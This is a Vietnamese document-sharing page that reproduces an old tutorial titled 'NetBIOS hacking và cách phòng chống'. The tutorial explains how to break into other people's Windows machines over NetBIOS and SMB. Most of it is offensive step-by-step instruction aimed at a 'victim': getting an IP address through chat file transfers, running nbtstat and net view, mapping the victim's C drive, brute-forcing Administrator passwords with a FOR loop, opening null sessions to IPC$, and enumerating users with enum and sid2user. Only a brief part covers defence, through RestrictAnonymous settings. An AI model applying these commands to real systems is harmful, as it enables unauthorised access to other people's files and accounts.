intTypePromotion=1
zunia.vn Tuyển sinh 2024 dành cho Gen-Z zunia.vn zunia.vn
ADSENSE

NetBIOS hacking và cách phòng chống

Chia sẻ: Ai Dieu | Ngày: | Loại File: DOC | Số trang:6

165
lượt xem
35
download
 
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

NetBIOS là viết tắt của chữ Network Basic Input Output System. Đầu tiên nó được IBM và Sytek xây dựng để truy nhập vào các tài nguyên được chia sẻ trong mạng LAN ( Local Area Network ). Tài nguyên trong mạng có thể là ổ đĩa, máy in , máy scan ....

Chủ đề:
Lưu

Nội dung Text: NetBIOS hacking và cách phòng chống

  1. NetBIOS hacking và cách phòng chống trang này đã được đọc  lần    NetBIOS là viết tắt của chữ Network Basic Input Output System. Đầu tiên nó được IBM và Sytek xây dựng để  truy nhập vào các tài nguyên được chia sẻ trong mạng LAN ( Local Area Network ). Tài nguyên trong mạng có  thể là ổ đĩa, máy in , máy scan ....  Nếu bạn đã từng làm việc trong các mạng LAN và sử dụng hệ điều hành Windows ( windows9.x , me, 2000,  XP .... ) thì bạn đã từng bấm đúp chuột vào biểu tượng Network Neghborhood ( hay My Network Places ) để  truy nhập tới các may tính khác trong mạng => đó chính là bạn đã sử dụng một số lệnh của NetBIOS trong  môi trường Winđows. Mỗi mỗi service trong máy đều làm việc trên một cổng nào đó, NetBIOS cũng được gán cho một số cổng tùy  theo bạn đang sử dụng HDH nào. TCP 135 RPC/DCE Endpoint mapper UDP 137 NetBIOS Name Service UDP 138 NetBIOS Datagram Service TCP 139 NetBIOS Sesion Service ( SMB/CIFS over NetBIOS TCP/UDP 445 Direct Host ( SMB ­ Server Mesage Block  CIFS ­ Common Internet File System ) Mặc định thì Windows 9.x ( 95,98,98se ), NT4 và Windows2000 sẽ lắng nghe trên cổng 139, nhưng Windows  9.x không lắng nghe trên cổng TCP/UDP 135 ( => chính vì điều này mà đợt vừa qua khi phát hiện ra lỗi RPC ,  Virus Blaster không gây ảnh hưởng gì cho các máy tính đang chạy Windows 9.x ) Windows 2000 và XP cũng  lắng nghe trên các cổng TCP/UDP 445 => Dựa vào các hiểu biết này và các lệnh của Windows ( các lệnh này thường nằm trong  C:\Windows\system32 ­ hoặc WinNT \ system32 ) người ta có thể truy nhập vào các máy tinh khác trong mạng  Tìm kiếm IP của victim  Nhắc lại một tý về IP : IP là một số xác định được gán cho mỗi máy tính trong một mạng nào đó. IP được biểu diễn là một số 32 bit, các bit đựơc chia thành 4 phần mỗi phần 8 bit ( 1 byte ). Có 3 cách để biểu  diễn cho một địa chỉ IP Dạng thập phân ( dạng hay dùng nhất ) Ví dụ : 130.57.30.56 Dạng nhị phân : 10000010.00111001.00011110.00111000 Dạng Hexadecimal 82 39 1E 38 Trong mỗi địa chỉ IP bao giờ cũng có hai phần là địa chỉ mạng ( Networrk Address ) và địa chỉ máy ( Node  Address ). Các máy tính trong một mạng bao giờ cũng có cùng một địa chỉ mạng  ( Các bạn có thể tìm thấy bài viết chi tiết về địa chỉ IP trên HVA portal ) Để biết địa chỉ IP của mình bạn có thể dùng lệnh trong windows để xem : 1­ Nếu bạn đang dùng Windows 9,x : Bấm vào Start \ run sau đó đánh vào lệnh command rồi bấm OK ( Để chạy ra màn hình DOS ­ DOS shell ) Tại dấu nhắc của lệnh DOS đánh vào lệnh IPCONFIG ( hoặc IPCONFIG / ALL ) Nếu bạn dùng Win98 có thể sử dụng Start \run rồi đánh vào lệnh WINIPCFG cũng cho kết quả tương tự 2­ Nếu bạn dùng Win2000, XP ... Bấm vào Start \ run sau đó đánh vào lệnh cmd rồi bấm OK ( Để chạy ra màn hình DOS ­ DOS shell ) Tại dấu nhắc của lệnh DOS đánh vào lệnh IPCONFIG ( hoặc IPCONFIG / ALL )  Bạn chú ý nhìn dòng IP Address rồi nhìn sang bên phải thấy một số có dạng xxxx.xxxx.xxx.xxx 
  2. địa chỉ IP của bạn khi bạn vào mạng Công việc tìm kiếm IP và xem nó có mở cổng không của victim thường mất rất nhiều thời gian ­ Người ta có  thể dùng một số Tool để thực hiện việc tìm kiếm cho nhanh ( và đỡ tốn tiền Net ) như NetScanPro2000, hay  Esential NetTools ( ET3 ), IP Tool ...  ­ Bài hướng dẫn về cách sử dụng và nơi Download cũng có trên 4rum ­ Các bạn có thể vào mục đồ nghề để  tìm  Nếu bạn đang sử dụng ICQ để chát với victim bạn có thể sử dụng lệnh netstat ­n ( lệnh này sẽ cho ta biết các  kết nối đựơc thiết lập giữa máy của ta và bên ngoài và qua các cổng nào ) để biết IP của victim. Ví dụ sau khi chạy lệnh netstat ­n ta sẽ nhận đựơc bảng sau : Active Connections Proto Local Address Foreign Address State TCP 192.168.0.1:3537 203.195.136.156:2869 Established ................................................................................................................................................................................ ........ Bạn chú ý nhìn ở dưới dòng chữ Foreign Address số 203.195.136.156  báo cho bạn biết một kết nối đã được thiết lập giữa máy tính của bạn và victim. Còn nếu bạn sử dụng MSN hay YH, nếu sử dụng lệnh netstat ­ n có thể bạn không nhìn thấy IP của victim mà  có thể là địa chỉ của Server của MSN hay YH Để xác định chính xác bạn có thể sử dụng Send File của YH để gửi một file tới victim. Trước khi Send File, sử  dụng lệnh netstat ­n để xác định các kết nối đã có trong khi đang Send file bạn lại sưe dụng lệnh netstat ­n +> sau đó tìm địa chỉ IP nào mà mới được thiết lập =>  đó chình là dịa chỉ IP của Victim ( vì khi Send file nó se thiết lập một kết nối trực tiếp giữa máy bạn và victim ) Sau khi đã có địa chỉ IP của victim bạn sử dụng lênh nbtstat ­a ipAddress ( lệnh này dùng để xác đinh một số  thông tin trên máy victim ... ) Ví dụ : C:> nbtstat ­ a 203.210.136.23 (  Nếu thấy số này có nghĩa là máy victim đã bật chế độ chia sẻ File và máy in  ( File And Printer Sharing ) Tiếp theo ta sử dụng lệnh net view \\ipaddress ( lệnh này dùng để xem máy vic tim chia sẻ những cái gì để còn  .... ) Ví dụ : C:> net view \\203.210.136.23 Bạn có thể thấy các dòng tương tự như ở dưới đây : Shared resource at \\203.210.136.23 Share name Type User As Comment C Disk  D Disk IPC$ Disk 
  3. ......................................................................... The command complete succesfully =D> Đến đây bạn vào tìm file LMHost ­ nếu không có thì tạo ra ( Nếu bạn sử dụng window98 thì nó nằm ngay  trong thư mục windows, nếu là XP thì trong thư mục Windows\System32\Drivers \etc còn Win2000 thì nằm  trong WinNT\System32\Drivers \etc ) Lạm bàn về LMHost : Ngày trước tên máy và địa chỉ IP được lưu vào trong đó ­ Nó được dùng để phân giải tên  máy và địa chỉ IP ( Name ­ to ­ Address ) File này được cập nhật và quản lý bởi SRI ­ NIC ( Standford Research Institute Network Information Center ),  vài tuần một lần tổ chức này lại cập nhật lại nội dung File này Ngày trước các Admin của mạng thường Download về Server của mình. Dần dần số lượng của các trang Web  trên Net ngày càng nhiều => cách sử dụng này trở nên thiếu hiệu quả và mất thời gian => DNS ra đời ... ( Cũng có bài viết chi tiết về DNS trên HVA portal ) Sau đó bạn thêm vào trong File này theo cú pháp sau :  ipAddressvictim tênmáy #PRE Ví dụ ở đây tôi thêm vào dòng : 203.210.136.23 MAY1 #PRE trong File LMHost rồi chạy lệnh nbtstat ­R để nạp lại table cache Bây giờ bạn có thể tạo thêm một ổ trên máy tính của mình và kết nối tới ở hay thư mục được Share trên máy  tính của victim bằng cách sử dụng lênh Net use Net use Tênổđĩa : \\ipAddressVictim\shareName Ví dụ : Net use X: \\203.210.136.23\C Nếu thấy dòng lệnh  The command was complete succesfully  Done, bấm đúp vào My Computer và xem thử xem có gì mới trong máy tính của ta không. Để tránh nhầm lẫn khi ánh xạ ổ đĩa ta có thể sử dụng ký hiệu * thay cho tên ổ đĩa net use * \\203.210.136.23\C Thế nhưng nhiều khi cuộc đời không đẹp như mơ vì khi thực hiện đường truyền của bạn chậm hay vì máy  victim đặt pass truy nhập. ... Nếu máy victim sử dụng Windows95,98,98se hay Win me bạn có thể tạm dùng pass : PQWAK ( cái này giống  như kiểu concat trên các Main đời cũ ) Thế thì còn máy tính dùng 2000 hay XP ... mà đặt pass và user thì làm thế nào => ta có thể xây dựng một từ  điển để dò và sử dụng lệnh For của DOS để thực hiện Vídụ tôi sẽ tạo ra một File có tên là DoPass.txt và có định dạng sau : password username password Administrator "" Administrator admin Administrator ............................................................ Và bấy giờ ta có thể sử dụng lệnh For C:\FOR /F "token=1,2* " %i in (DoPass.txt ) Do net use \\IpAddressvictim\ShareName  ( cú pháp sử dụng của lệnh FOR xin các bạn xem trong help của Windows ) Trước khi tiếp tục chúng ta cần tìm hiểu thêm một số thông tin về dòng Window2000 ( 2000 Pro, 2000 family  và 2000 Advandce server ) và Windows XP. Mặc định sau khi cài đặt xong các hệ điều hành này thì tất cả các  ổ đĩa của và một số thư mục của chúng sẽ được thiết lập ở chế độ Share ẩn­  Thế Sharre ẩn là gì ? Bình thường nếu bạn đã làm việc trong môi trường mạng thì việc chia sẻ các ổ đĩa hay  thư mục bằng cách bấm phím phải chuột trên ổ đĩa hay thư mục và chọn Sharing => Ổ đĩa hay thư mục đó sẽ 
  4. xuất hiện trên mạng. Nhưng nếu bây giờ ta thêm vào sau tên của ổ đĩa hay thư mục chia sẻ ký hiệu $ thì việc  chia sẻ vẫn xảy ra nhưng không hiện lên trên mạng và chỉ có người nào biết đường dẫn chính xác mới có thể  sử dụng đựơc các tài nguyên này  Để xem được các thông tin về việc chia sẻ trên máy tính của mình bạn có thể vào Start \ Program \  Administrator Tools \ Computer management sau đó chọn vào mục Shared Folders để kiểm tra lại máy của  mình ( Nếu trong Program chưa có mục Administrator Tools bạn bấm phím phải chuột trên nút Start chọn  properties sau đó chọn mục Display Administrator Tools ) Ví dụ bạn có thể nhìn thấy các thông tin sau : Sharename Resource Remark ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ADMIN$ C:\WINNT Remote Admin C$ C:\ Default Share for Internal Use D$ D:\ Default Share for Internal Use E$ E:\ Default Share for Internal Use print$ C:\WINNT\SYSTEM\SPOOL  IPC$ Remote IPC Nếu bạn đang dùng XP thì ADMIN$ sẽ là C:\WINDOWS ( Thư mục mặc định khi bạn cài XP ). .... Bạn có thể cắt tất cả các chế độ Share của các ổ trên máy tính nhưng riêng IPC$ thì không thể bỏ nó đi đựơc  ( Trên 4rum đã có một bài nói về cách tất chế độ Share của IPC$ bằng cách sử dụng một số lệnh viết trong  File autoexec.bat ­ Bạn có thể tìm lại bài đó để xem ) Thế còn thông tin về user và pass được lưu ở đâu, trên các hệ thống NT và windows2000 và XP chạy ở nhà  ( Stand ­ alone ) các thông tin này được lưu ở trong File %systemroot % \ system32 \ config \sam  Với %system root % ­ chính là thư mục mà bạn cài đặt windows ( có thể là windows, winNT ...etc ) Và File đó gọi là File SAM ­ Security Accounts Manager. Các thông tin lưu trong này được mã hoá theo cái gọi  là one­ way function ( OWF) hoặc giải thuật Hash và kết quả là giá trị mà nó lưu giữ không thể đựơc giải mã  ( decrypted)  Trong Windows2000 Domain Controller các thông tin này đựơc lưu trong Active Directory ( nếu khi cài đặt để ở  chế độ mặc đinh thì nó nằmg trong %systemroot \ ntds \ntds.dit ­ File này vào khoảng 10Mb => Việc Down về  để giải mã cũng như việc giả mã là không thể => thường nếu định dò pass của DC thì tốt nhất là" chuyển " ) SID Khi Windows2000 hay Windows2000 Domain được cài đặt nó sẽ sinh ra một số ngẫu nhiên cho mỗi User ­  Đây là một số 48 Bit được gọi là Security Indentifier ( SID ) Một số SID có thể có dạng như sau : S­1­5­21­1507001333­1204550764­1011284298­500 Một SID bao giờ cũng bắt đầu với chữ S và các thành phần của nó được ngăn cách nhau bởi dấu trừ  ( Hyphens ). Số đầu tiên là số duyệt ( Revision number ) ­ ỏ ví dụ trên nó là 1 Số thứ hai là là nói về HDH ­ ví dụ số 5 luôn luôn là của Windows2000. Tiếp theo là 4 nhóm chữ sô và cuối  cùng là RID ( relative Identìier ). Chà ta quan tâm đến RID một tý nào  Nếu một SID mà có RID là 500c => Đó là Amin của máy cục bộ RID là 501 => guest Nếu ở trong Domain thì RID luôn bắt đầu từ 1000 khi tạo ra User đầu tiên => khi ta nhìn thấy RID =1015 => hệ  thống có 14 User đựoc tao ra trong hệ thống. OK => đến đây ta lại quay lại bài NetBIOS hacking và cách phòng chống. Hầu hết các User đều cho rằng khi Disable netBIOS over TCP/IP ( Bấm vào My Network Places chọn Local  Area Connetion, chọn TCP/ IP sau đó bấm vào propperties chọn Advandce, chọn WINS và bấm vào Disable 
  5. NetBIOS over TCP / IP) là đã chặn đựơc cách thâm nhập vào máy qua NetBIOS Thực ra việc thiết lập này chỉ chặn trên cổng 139. Khác với NT4, Windows2000 còn chạy một SMB lắng nghe  trên cổng 445. Cổng này vẫn còn Active cho dù NetBIOS over TCP / IP đã đựoc Disable.. Phần Windows SMB cho Cllient từ sau version NT4 SP 6a sẽ tự động chuyển lên cổng 445 nếu như cố gắng  kết nối trên cổng 139 =>  Ta có thể thiết lập một kết nối gọi là " null sesion" tới máy của victim net use \\192,168.203.33\IPC$ "" /u:""  Để chống lại ta có thể can thiệp vào Registry : HKLM \ system \CurrentControlSet \ Control \ LSA \ RestrictAnonymous Bấm đúp vào key RestrictAnonymous ở panel bên phải và nhập vào trong khung Value 2 RestrictAnonymous có 3 giá trị  0 Đây là gía trị mặc định của nó khi cài Winddows 1 Không cho phép tìm hiểu các thông tin của SAM 2 Không cho phép truy nhập  Ở đây bạn phải lưu ý rằng nêu bạn để RestrictAnonymous với giá trị là 1 thì vẫn có thể dung một số Tool như  user2sid/sid2user hay UserInfor hoặc UserDump .... để lấy được thông tin về user và truy nhập vào máy bạn  được Nếu thiết lập được một Null sesion tới máy victim ta có thể sử dụng một số Tool để truy nhập vào máy của  victim : 1 ­ enum ­U is get userlist ­M is get machine list ­N is get namelist dump (different from ­U|­M) ­S is get sharelist ­P is get password policy information ­G is get group and member list ­L is get LSA policy information ­D is dictionary crack, needs ­u and ­f ­d is be detailed, applies to ­U and ­S ­c is don't cancel sessions ­u is specify username to use (default "") ­p is specify password to use (default "") ­f is specify dictfile to use (wants ­D) ta có thể sử dựng lệnh C:\> enum ­U ­d ­P ­L ­c địa_chỉ_IP_của victim 2­ DumpSec (DumpACL) Vì DumpSec là giao diện đồ họa nên khá dễ sử dụng ( menu Report ) 3­ Sid2user và User2sid User2sid.exe có thể nhận SID từ SAM (Security Accounts Manager) trên máy local hay trên remote machine  Sid2user.exe có thể sử dụng để thu thập các acc của user  C:\>user2sid \địa_chỉ_IP_của_victim "domain user" kết quả nhận đựơc
  6. [COLOR=orange]S­1­5­21[/COLOR]­1234567­890123456­1234567890­513 Number of subauthorities is .... Domain is .... Length of SID in memory is ....byte Type of SID is .... Sau đó sử dụng sid2user  C:\> sid2user \\địa_chỉ_victim 5 21 1234567 890123456 1234567890 500 .... 4­ UserInfo userinfo [­b] [­estwn] [­D domain­name | ­S hostname] [user­name...]  userinfo (­a|u) [­e] [­D domain­name | ­S hostname] [­f fieldname:value ...] user­name...  userinfo ­d [­e] [­D domain­name | ­S hostname] user­name...  Ngoài ra còn có một số Tool khác nữa như UserDump, GetAcc, walksam. Nhưng tất cả các Tools trên đây đều yêu cầu có được một kết nối Null session tới máy của Victim => Nếu thiết  lập RestrictAnonymous=2 thì các Tool trên đều vô tác dụng

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản
2=>2